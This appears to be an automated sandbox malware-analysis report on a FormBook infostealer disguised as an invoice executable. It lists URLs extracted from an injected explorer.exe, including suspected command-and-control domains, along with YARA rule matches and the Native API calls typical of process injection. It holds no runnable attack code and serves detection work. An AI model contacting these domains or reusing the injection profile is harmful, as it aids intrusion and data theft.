          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whatsapp-p.vip
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whatsapp-p.vip/ps94/
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whatsapp-p.vip/ps94/www.0909000000.com
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whatsapp-p.vipReferer:
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xsmci844n.xyz
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xsmci844n.xyz/ps94/
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xsmci844n.xyz/ps94/www.whatsapp-p.vip
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xsmci844n.xyzReferer:
          Source: explorer.exe, 00000006.00000002.4576902111.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2150317707.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
          Source: explorer.exe, 00000006.00000002.4582720574.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2153411918.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000006.00000002.4576280943.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2148343923.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000006.00000002.4576280943.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2148343923.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/I
          Source: explorer.exe, 00000006.00000000.2148343923.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4576280943.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000006.00000002.4576280943.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2148343923.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
          Source: explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2148343923.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4576280943.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000006.00000000.2148343923.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4576280943.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
          Source: explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
          Source: explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
          Source: explorer.exe, 00000006.00000002.4582922862.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2984825740.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2153411918.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com-
          Source: explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
          Source: explorer.exe, 00000006.00000002.4582922862.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2984825740.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2153411918.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.come
          Source: explorer.exe, 00000006.00000002.4582720574.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2153411918.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEMd
          Source: explorer.exe, 00000006.00000002.4584969121.0000000010C6F000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000007.00000002.4572473612.000000000513F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://status.squarespace.com
          Source: explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000002.4576902111.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2150317707.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/e
          Source: explorer.exe, 00000006.00000002.4582922862.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2984825740.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2153411918.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comM
          Source: explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
          Source: explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
          Source: explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
          Source: explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
          Source: explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
          Source: explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
          Source: explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
          Source: explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
          Source: explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
          Source: explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
          Source: explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
          Source: explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
          Source: explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
          Source: explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
          Source: explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4571709994.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4571667584.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2141241119.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4570982856.00000000005D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.4585321350.0000000010FB7000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4571709994.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4571709994.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.4571709994.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4571667584.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4571667584.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.4571667584.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2141241119.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2141241119.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2141241119.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4570982856.00000000005D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4570982856.00000000005D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.4570982856.00000000005D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe PID: 4512, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe PID: 3492, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
          Source: Process Memory Space: msiexec.exe PID: 1428, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0041A360 NtCreateFile,4_2_0041A360
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0041A410 NtReadFile,4_2_0041A410
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0041A490 NtClose,4_2_0041A490
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0041A540 NtAllocateVirtualMemory,4_2_0041A540
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0041A35A NtCreateFile,4_2_0041A35A
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0041A45A NtReadFile,4_2_0041A45A
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0041A40A NtReadFile,4_2_0041A40A
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0041A53A NtAllocateVirtualMemory,4_2_0041A53A
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0041A5BA NtAllocateVirtualMemory,4_2_0041A5BA
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2B60 NtClose,LdrInitializeThunk,4_2_010C2B60
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_010C2BF0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2AD0 NtReadFile,LdrInitializeThunk,4_2_010C2AD0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_010C2D10
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_010C2D30
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2DD0 NtDelayExecution,LdrInitializeThunk,4_2_010C2DD0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_010C2DF0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_010C2C70
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_010C2CA0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2F30 NtCreateSection,LdrInitializeThunk,4_2_010C2F30
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2F90 NtProtectVirtualMemory,LdrInitializeThunk,4_2_010C2F90
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2FB0 NtResumeThread,LdrInitializeThunk,4_2_010C2FB0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2FE0 NtCreateFile,LdrInitializeThunk,4_2_010C2FE0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_010C2E80
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_010C2EA0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C4340 NtSetContextThread,4_2_010C4340
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C4650 NtSuspendThread,4_2_010C4650
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2B80 NtQueryInformationFile,4_2_010C2B80
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2BA0 NtEnumerateValueKey,4_2_010C2BA0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2BE0 NtQueryValueKey,4_2_010C2BE0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2AB0 NtWaitForSingleObject,4_2_010C2AB0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2AF0 NtWriteFile,4_2_010C2AF0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2D00 NtSetInformationFile,4_2_010C2D00
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2DB0 NtEnumerateKey,4_2_010C2DB0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2C00 NtQueryInformationProcess,4_2_010C2C00
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2C60 NtCreateKey,4_2_010C2C60
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2CC0 NtQueryVirtualMemory,4_2_010C2CC0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2CF0 NtOpenProcess,4_2_010C2CF0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2F60 NtCreateProcessEx,4_2_010C2F60
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2FA0 NtQuerySection,4_2_010C2FA0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2E30 NtWriteVirtualMemory,4_2_010C2E30
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2EE0 NtQueueApcThread,4_2_010C2EE0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C3010 NtOpenDirectoryObject,4_2_010C3010
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C3090 NtSetValueKey,4_2_010C3090
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C35C0 NtCreateMutant,4_2_010C35C0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C39B0 NtGetContextThread,4_2_010C39B0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C3D10 NtOpenProcessToken,4_2_010C3D10
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C3D70 NtOpenThread,4_2_010C3D70
          Source: C:\Windows\explorer.exeCode function: 6_2_10F9F232 NtCreateFile,6_2_10F9F232
          Source: C:\Windows\explorer.exeCode function: 6_2_10FA0E12 NtProtectVirtualMemory,6_2_10FA0E12
          Source: C:\Windows\explorer.exeCode function: 6_2_10FA0E0A NtProtectVirtualMemory,6_2_10FA0E0A
